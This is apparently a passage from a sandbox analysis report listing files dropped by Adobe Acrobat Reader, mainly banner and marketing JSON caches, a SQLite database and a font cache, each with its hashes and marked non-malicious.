                                                                                  Size (bytes):295
                                                                                  Entropy (8bit):5.375782545800527
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJM3g98kUwPeUkwRe9:YvXKXgWBMVbsdTeODZGMbLUkee9
                                                                                  MD5:7776A449B083085AAF486C08005CD54B
                                                                                  SHA1:9E58E867E34B7046B1D09AA247E0964DF499AE43
                                                                                  SHA-256:20464D921A589893835B6E773F678D712A326E2F5BE547E902ECBE3371490D8C
                                                                                  SHA-512:33BE0B90EA4F4499771CD25DE1B3301BAD80B2D1E7A484EB76A45C342A29CB9249A182255BE1C1BB8AE87E98AC8A9F454F6226411B13C1904886F43768406BA9
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):294
                                                                                  Entropy (8bit):5.31020602214183
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJfBoTfXpnrPeUkwRe9:YvXKXgWBMVbsdTeODZGWTfXcUkee9
                                                                                  MD5:C5DECA9D681B4430B18D127C72F7F024
                                                                                  SHA1:1523C8E724835FEB6FE02C39CB2F4E20B054324C
                                                                                  SHA-256:2277F78BCE3282A9808F0E545FE9416D42B3853D68F2D99A323F139F1EBD7396
                                                                                  SHA-512:F7EE9882ADA911B8554FF8DE8B57F936C3CC43F10BEB41093C234C95041373988B05FEC80DF12663CD428A4AF393AD64788808E10C0C13F20E26D35ADD016DA0
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):294
                                                                                  Entropy (8bit):5.288158622141189
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJfBD2G6UpnrPeUkwRe9:YvXKXgWBMVbsdTeODZGR22cUkee9
                                                                                  MD5:AE2320F1886CDAD00A7B46E5020E0D38
                                                                                  SHA1:D329A9D73FA5F87EC4C238E70CD07D5A3FC8AFE9
                                                                                  SHA-256:B80D4D97EA5A5D1E33DBEB4CD4675BAD143A97ED506F81E2AB3BECE917B5A635
                                                                                  SHA-512:58E46590E3E0DE7AECAAEF8DA959C9D1E3990E618CA72765B006FFDD3B230DFBE9EAF4F24923693B37D718CCD2F58A2037387C966C37CE58992470CE5C14D080
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):285
                                                                                  Entropy (8bit):5.363096608937213
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJfPmwrPeUkwRe9:YvXKXgWBMVbsdTeODZGH56Ukee9
                                                                                  MD5:7A3C8EF654E43B3878900C39ACE99143
                                                                                  SHA1:3CBE74480964AE3077F9DAF49A8701B1F03A21D0
                                                                                  SHA-256:045D71A5700EBFF4D4CDA67561DE5DBFAFBD3B95E0CF3A06242CD0BA6729F009
                                                                                  SHA-512:B639B89C002F8B8092912046F27360E81ED0FB2C7206CB82DF2B8C60FAD30FF644266A43CA98E8A6F907A48E51FB29805EB419E5D068EC8950AB7B97064E1956
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):1123
                                                                                  Entropy (8bit):5.693891923123173
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:Yv6Xg/bmeOapLgE9cQx8LennAvzBvkn0RCmK8czOCCSm:YvfCexhgy6SAFv5Ah8cv/m
                                                                                  MD5:B9F0EA5B3E91036D8FEA30A24AA92429
                                                                                  SHA1:2D3C9B03A00CDEDCC47CB92F5CC049FC3F26EF85
                                                                                  SHA-256:3AD3838A2E2FD984AAB90E62024D7F6D041A8E1453E169CD56B0B41F54AC16DC
                                                                                  SHA-512:599EE211E3CB6B6BCC1A5E8E382123BDFA6686E589BB38620E46ADA3E54E58363FB838A833D2376E5E9A82230071CB0856219EB246E10DD64BD824CD66E2680F
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):289
                                                                                  Entropy (8bit):5.299556555241285
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJf8dPeUkwRe9:YvXKXgWBMVbsdTeODZGU8Ukee9
                                                                                  MD5:FDAEF23758E3D823DC81FF428DDB5730
                                                                                  SHA1:17A2B9ACF7540CC9A1335550F78CBB490EC0A0A7
                                                                                  SHA-256:BFDB27D9C1ABB3D49BB079E003E3C82138E30B63A48163E81B2EF7E4C45A6D44
                                                                                  SHA-512:78C32AC0177D324AF082689FC6A053F1EA6B3A329732062534BBDD90ADABB47568C1ED3E87D96D71AE5879CF2706F99033CBC388A71AB1DC6B3881A174CAF297
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):292
                                                                                  Entropy (8bit):5.304061543581749
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJfQ1rPeUkwRe9:YvXKXgWBMVbsdTeODZGY16Ukee9
                                                                                  MD5:F0A0D5B8F9D2637869E025433FEF2A8B
                                                                                  SHA1:1F5DEAD4564A1452A4EF5A528BBADE11C54FEA10
                                                                                  SHA-256:A729174AAAA623695883FD1455F26DD1EC80C0A5E00EF837EE03E3964AAB862D
                                                                                  SHA-512:5054F836CB391ACCC51A9C0BFC40A18AE06B7655F34BA4BC413E8ACA43F26B29F1133EDDA92C8379057CC30D4CDBA31A59D3B2A9154814CEC1DE074BFABEA02E
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):289
                                                                                  Entropy (8bit):5.318181860922783
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJfFldPeUkwRe9:YvXKXgWBMVbsdTeODZGz8Ukee9
                                                                                  MD5:DE2A2425FC3DD5BE397F18F6FE94C9A2
                                                                                  SHA1:DC37A3AA03C448EB824007BFCC3465AC4AD82F37
                                                                                  SHA-256:F48ABEC819111463EDA1B41EA381D96FD7253319DFEB3CA257D6907916933A58
                                                                                  SHA-512:2889D61B9043D243850C1DCBF992149CB5D68E92063FBBBC59BD8998862D111A4B00AC8EBAE17190C33E65A15C7AC1BADDB53B98C67D3AB9E29D41264447FF31
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):295
                                                                                  Entropy (8bit):5.326291326872587
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJfzdPeUkwRe9:YvXKXgWBMVbsdTeODZGb8Ukee9
                                                                                  MD5:73F834BE524AA5216FAE108C983BC59E
                                                                                  SHA1:613E4E2E6DCE044448D92F5BDD77817A90C401D1
                                                                                  SHA-256:84EFE02EAFF9C6B835AD3BA48FE36DCDBC992B1851C3D0A00A7E0642AA65F7D7
                                                                                  SHA-512:7E55D23E879B838CECFE241C503B3EEB39FC18FEAD56C86A82BA1EEC1855F179A2868225958599F8A1ADBB0DE9D3EC35FB7E66ACE921E0B6D7FC269D9B52CA40
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):289
                                                                                  Entropy (8bit):5.3070788974515475
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJfYdPeUkwRe9:YvXKXgWBMVbsdTeODZGg8Ukee9
                                                                                  MD5:15CD30EC32245147F65092BB6D74014E
                                                                                  SHA1:E712DFC0FCDF880A9215DBD84FE1B65850D83A0F
                                                                                  SHA-256:0F44C9703B4E0E2EBD6262D1982464B5C746BC75AFB50C228F00BE56125B0EAC
                                                                                  SHA-512:C09C78A28F5EE9BAB7F46551E638CC476F6D5092852717529F1CDDB5B20AC3251A5878497BFEAA80250E24AC8551FA6D45045D932EBA43F8ED08DDC4528128DF
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):284
                                                                                  Entropy (8bit):5.29293619721764
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJf+dPeUkwRe9:YvXKXgWBMVbsdTeODZG28Ukee9
                                                                                  MD5:88E7C6C90BD8CB1BB76537CD19AC246B
                                                                                  SHA1:83CE82580CEAFFEC328C3BDCBC5D1F627E98B87B
                                                                                  SHA-256:DE33756E079A7D224D8C704C8DC4A84B88F7CBC391AFA37567C20136B12876AC
                                                                                  SHA-512:49B71BCA3EFF312E43C15F63D3F557BFAA5C583731E7889280036485254FCC6E9BD684DA356507FE41480D0227061E3DFB407FD7A50D3EA6C6229636E7C438AB
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):291
                                                                                  Entropy (8bit):5.290577342909249
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJfbPtdPeUkwRe9:YvXKXgWBMVbsdTeODZGDV8Ukee9
                                                                                  MD5:36587F6F6C8328612992F4CAE2D8EE0E
                                                                                  SHA1:7C881A9E4CBE281123248DCF4AF95DE743894E5D
                                                                                  SHA-256:95CA4A1712259372D82144E6956917124C6E1971280B915300225012234BF1CD
                                                                                  SHA-512:DAA88B98865539F9BC41F49E72780D1E816C9AFA1C0813DCFF028C006E60E6F09F46D3C1E9A0A68AA249D65B522C866C9A10F5723B20E2DF1FD7E29BA86C920B
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):287
                                                                                  Entropy (8bit):5.295326778057465
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJf21rPeUkwRe9:YvXKXgWBMVbsdTeODZG+16Ukee9
                                                                                  MD5:0CEF07D99CCE5580993B5A4B5E2A4A43
                                                                                  SHA1:276D33595585BF29D1314DD307A90F503D572293
                                                                                  SHA-256:4E51D4826DC3CB5CBA241B2E2A6A9268D02552B6A7CA71F50A064A6DAA8D3AAE
                                                                                  SHA-512:194C825CA9860E59576E4FD97B293DBA93D49EEEED2BE7DE3AF337D6C1B71D887D8788351D94A639E1AECFBE7C0A156077EFBD2BF69244523E645D498BE65F3E
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):1090
                                                                                  Entropy (8bit):5.668726724356089
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:Yv6Xg/bmeOGamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSm:YvfCedBgkDMUJUAh8cvMm
                                                                                  MD5:91D080E67AC7EDA3608FEB30F4EE6FEC
                                                                                  SHA1:F5995A7F71A755358F36D0F3303BE963A9D21B4F
                                                                                  SHA-256:40B48BF076630C978FBFDBF6942C8CE34ACDB86D5D27E9E60789795C2B9E24D2
                                                                                  SHA-512:D6BC0A694F4074C535CEF1C94F6547530BE0A38C30C81BAE6C0DD46EC6A7BAA0387510C4DC701D01ADC615C0676F75C62F70F6BBC3A26857C36CE08CBEDD2C79
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):286
                                                                                  Entropy (8bit):5.269536000432144
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJfshHHrPeUkwRe9:YvXKXgWBMVbsdTeODZGUUUkee9
                                                                                  MD5:BA3A36D085342CADE8120132A8244B82
                                                                                  SHA1:415F0B6E89E17ECE31493D92AE0DC7B59D055463
                                                                                  SHA-256:E37CE183376811A7D926F9BAB34D871C27A2EC4B4672D5C5BF33B1184A0A85ED
                                                                                  SHA-512:4B9BDBB5015A33192B581A91B819D5164DB85C7848AAA65EC6033E375FAA4D0BF994E479CEB71357041E3BEB289788040A801770A99DAAD5256C99CF0E99ECBC
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):282
                                                                                  Entropy (8bit):5.290603768263948
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJTqgFCrPeUkwRe9:YvXKXgWBMVbsdTeODZGTq16Ukee9
                                                                                  MD5:73ECC9F3D61F5423065ECFD81FF16F1A
                                                                                  SHA1:57E116C08986597D4F578AD02CCAA24F742ED86C
                                                                                  SHA-256:3D5D8FADE4A13E159DBFEF344555B4CA20A2A3A0A9E38A0AED2EEFF3EFFCA8BD
                                                                                  SHA-512:47E9D31A49EA009A9BDCFA9F1FBAEDBB08AEC602351EB54B7110362E161EF3DDC45129DA9ADFC8EDF0CD5C2E51E2F64D05BC2584A01AC4F6D8FC788F605641A3
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):4
                                                                                  Entropy (8bit):0.8112781244591328
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:e:e
                                                                                  MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                  SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                  SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                  SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                  Malicious:false
                                                                                  Preview:....
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):2814
                                                                                  Entropy (8bit):5.13398019669336
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:YkjPLo3a0nayw+JaWViDoLt64lWJ/0GpNhjfj0SvwCD2t2LSBCvxk6S2Lc5x4z9j:YkjToi+BQ46RiArEQ0vWkp2IC9j
                                                                                  MD5:DD0160558827F163C6906973BF6FC14E
                                                                                  SHA1:F2A622AA10D13CF8273AFCC0D8B2C25FA9F660DE
                                                                                  SHA-256:32BC4C3F60C091217DD56D44271366C004E32CF9E0A6C1A489BB5784810D82C1
                                                                                  SHA-512:9C5109C6DDA869A164B128ECAD5A0958609C3F3C8AFC80336E341FA8EEEE5FFDB043DDC4E9182B23731359361E72036DDDF4BF70C2B6288701E8A9DA5D7C5D52
                                                                                  Malicious:false
                                                                                  Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"ea304e29de04410549fb3efa93963072","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734614075000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"869a04e4b9c959c2cf68b429d5477a08","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734614075000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"51a00a12b01d972a99d7f0509bc4f9c5","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734614075000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"8e53b7772507f3394e3e5e6e3d29c1af","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734614075000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"b8e29720fc399769c4405e0574924655","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734614075000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"22150f3281bdcc48ea370bb4aa487388","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                  Category:dropped
                                                                                  Size (bytes):12288
                                                                                  Entropy (8bit):1.452415437133283
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsoTilmTU:lNVmsw3SHtbDbPe0K3+fDZdzvo
                                                                                  MD5:EED734DFCBC0EAF0DE3B0EF9FB80E43B
                                                                                  SHA1:2E84A5D869A4DDCDCE722E1C467871A8E830D20E
                                                                                  SHA-256:0E15648808CFB570D7200D52B0DCD241738E99BA4AB44CDFFE8022B65A48E177
                                                                                  SHA-512:A085B9FA1D87EC86E38BF4F26D3AA3E2883A961BFD93F4874C6FA55C683E8BBF7F7BD6DDB4EEB43EFE7CB11D5D4AA2EFD0BD46D3FA41A4BED7A634AAF2F540A0
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:SQLite Rollback Journal
                                                                                  Category:dropped
                                                                                  Size (bytes):8720
                                                                                  Entropy (8bit):1.9573084794158802
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:7MxrvrBd6dHtbGIbPe0K3+fDy2dsoTLEqFl2GL7msh:7g3SHtbDbPe0K3+fDZdzcKVmsh
                                                                                  MD5:17244C830BB16952C77D68D28DE72934
                                                                                  SHA1:FCD6D88BF4625A69812E9BC23B538700F6CDC50A
                                                                                  SHA-256:DB56CBF5C81F42262E109D73D0EBF5C2758998FEDBDA14CCD243F36F9318C4F5
                                                                                  SHA-512:EC7BEDEF31896DA92FAF6CBECC58684DA3D24B23D8D0C8C11A5D6085762D21DB32E00379A87317570A6AC7673EDBBD444C974331FAC4FC7851A299B0D7E28145
                                                                                  Malicious:false
                                                                                  Preview:.... .c........Y......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):66726
                                                                                  Entropy (8bit):5.392739213842091
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:RNOpblrU6TBH44ADKZEgXKrjNgHB6StKnxx0zaY8jVgYyu:6a6TZ44ADEXKrABntyvhWK
                                                                                  MD5:786D31FC2A1AD4742808C9E31BB0C6C9
                                                                                  SHA1:CEB17328B06A5CE3C86F5DAE388A3E9DB2420CD7
                                                                                  SHA-256:F55FF30A750B24D69F6F069AC6C56550F329BE36E4996FA8374A4488C4DE9A15
                                                                                  SHA-512:DED5E60B6E0DC0DB89AAE310603CEF53CFD80F8E15FDF9C292A2AACFB611D49ACC00AF2B6C4A3713993E314301AD1F2F53AE1B60A1286358AE89BA27BAA01F92
                                                                                  Malicious:false
                                                                                  Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
